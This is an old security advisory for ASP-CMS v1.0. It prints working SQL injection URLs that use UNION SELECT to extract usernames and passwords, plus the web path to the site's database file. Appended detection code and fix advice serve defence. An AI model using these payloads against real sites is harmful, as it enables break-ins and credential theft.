ASP-CMS v.1.0 SQL Injection/Database Disclosure

2008-12-14T00:00:00
ID SECURITYVULNS:DOC:21011
Type securityvulns
Reporter Securityvulns
Modified 2008-12-14T00:00:00

Description

AUTHOR : Sina Yazdanmehr (R3d.W0rm)

Discovered by : Sina Yazdanmehr (R3d.W0rm)

Our Site : Http://IRCRASH.COM

IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi

Download : http://puzzle.dl.sourceforge.net/sourceforge/asp-cms/asp-cms.18-12-04.zip

DORK : :(

[SQL Injection]

Username : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_username,3,4,5,6,7,8,9,10%20from%20CMS_USERS

Password : http://Site/[path]/index.asp?cha=-999%20union%20select%200,1,user_password,3,4,5,6,7,8,9,10%20from%20CMS_USERS

[Database Disclosure]

http://Site/[path]/mdb-database/ASP-CMS_v100.mdb
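
Detection logic for the two issues above, added here as an example and not part of the original advisory: it flags requests where the cha parameter of index.asp is not a plain integer or carries a UNION SELECT, and any request for an .mdb file. It assumes cha is meant to hold an integer id (the advisory does not show the source); the request lines, the /cms/ path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed request lines ("METHOD URL"); /cms/ is a placeholder for [path].
SAMPLE_REQUESTS = [
    "GET /cms/index.asp?cha=12",
    "GET /cms/index.asp?cha=-999%20union%20select%200,1,user_username,"
    "3,4,5,6,7,8,9,10%20from%20CMS_USERS",
    "GET /cms/index.asp?cha=-999+UNION+SELECT+0,1,user_password,"
    "3,4,5,6,7,8,9,10+FROM+CMS_USERS",
    "GET /cms/mdb-database/ASP-CMS_v100.mdb",
    "GET /cms/images/logo.gif",
]

# Assumption: cha carries an integer id, so anything else is suspicious.
INT_RE = re.compile(r"-?\d+")
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)


def classify(request_line):
    """Return the finding labels for one 'METHOD URL' request line."""
    _method, _, target = request_line.partition(" ")
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    findings = []
    # Direct fetch of an Access database file from a web-served directory.
    if path.endswith(".mdb"):
        findings.append("mdb-download")
    if path.endswith("/index.asp"):
        # parse_qsl decodes %20 and +, so encoded payloads are checked in clear.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key.lower() != "cha":  # ASP query-string names ignore case
                continue
            if not INT_RE.fullmatch(value.strip()):
                findings.append("cha-not-integer")
            if UNION_RE.search(value):
                findings.append("cha-union-select")
    return findings


def scan(request_lines):
    """Map each flagged request line to its findings; clean lines are omitted."""
    return {line: found for line in request_lines if (found := classify(line))}


if __name__ == "__main__":
    for line, found in scan(SAMPLE_REQUESTS).items():
        print(", ".join(found), "<-", line)
```

The fix itself is on the server side: bind cha as a typed parameter in the query and move the .mdb file out of the web-served directory.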
